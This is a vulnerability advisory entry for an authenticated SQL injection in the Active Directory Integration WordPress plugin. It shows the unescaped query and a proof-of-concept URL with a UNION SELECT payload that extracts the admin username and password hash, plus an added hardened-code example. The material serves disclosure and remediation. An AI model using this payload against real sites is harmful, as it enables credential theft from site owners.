Active Directory Integration <= 1.1.8 - Authenticated SQL Injection


Description
Required access: administrator user.
The target must have LDAP configured and active.

Path Request: /wp-content/plugins/active-directory-integration/syncback.php

Line: 135
$result = $ADI->bulksyncback( $_GET['userid'] );

$_GET['userid'] is not escaped.


Path Method: /wp-content/plugins/active-directory-integration/BulkSyncBackADIntegrationPlugin.class.php

Line: 142
$wpdb->get_results("SELECT user_id FROM $wpdb->usermeta WHERE meta_key = 'adi_samaccountname' AND meta_value <> '' AND user_id <> 1 AND user_id = $userid");

Proof of Concept
target.dev/wp-content/plugins/active-directory-integration/syncback.php?userid=1+UNION+SELECT+CONCAT(user_login,char(58),user_pass)+FROM+wp_users+WHERE+ID=1
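The query above interpolates $userid straight into the SQL string. As an added example (not the plugin's own code), the vulnerable pattern is shown beside a hardened form that validates the parameter as an integer and binds it with $wpdb->prepare(); the handler wrapper, its capability check and nonce name are assumptions for illustration.

```php
<?php
// Added example, not code from the plugin. Assumes a WordPress context
// where the global $wpdb object and the usual helper functions exist.

// Vulnerable: $userid arrives from $_GET['userid'] and is concatenated into
// the statement, so a value such as "1 UNION SELECT ..." rewrites the query.
function adi_lookup_user_vulnerable( $userid ) {
    global $wpdb;
    return $wpdb->get_results(
        "SELECT user_id FROM $wpdb->usermeta WHERE meta_key = 'adi_samaccountname' "
        . "AND meta_value <> '' AND user_id <> 1 AND user_id = $userid"
    );
}

// Hardened: coerce the parameter to a non-negative integer, reject zero or
// non-numeric input, and bind the value with a %d placeholder so the
// database only ever sees an integer literal.
function adi_lookup_user_hardened( $userid ) {
    global $wpdb;
    $userid = absint( $userid );
    if ( 0 === $userid ) {
        return array();
    }
    return $wpdb->get_results(
        $wpdb->prepare(
            "SELECT user_id FROM {$wpdb->usermeta} WHERE meta_key = 'adi_samaccountname' "
            . "AND meta_value <> '' AND user_id <> 1 AND user_id = %d",
            $userid
        )
    );
}

// Assumed request handler (hypothetical): a script such as syncback.php should
// also gate on capability and a nonce before the parameter reaches the database.
function adi_syncback_handler() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }
    check_admin_referer( 'adi_syncback' ); // nonce action name is an assumption
    $userid = isset( $_GET['userid'] ) ? $_GET['userid'] : '';
    return adi_lookup_user_hardened( $userid );
}
```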

Affects Plugin

References

URL http://lenonleite.com.br/en/blog/2017/09/11/english-active-directory-integration-wordpress-plugin-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Verified No
WPVDB ID 8952

Timeline

Publicly Published 2017-11-03
Added 2017-11-12
Last Updated 2017-11-12
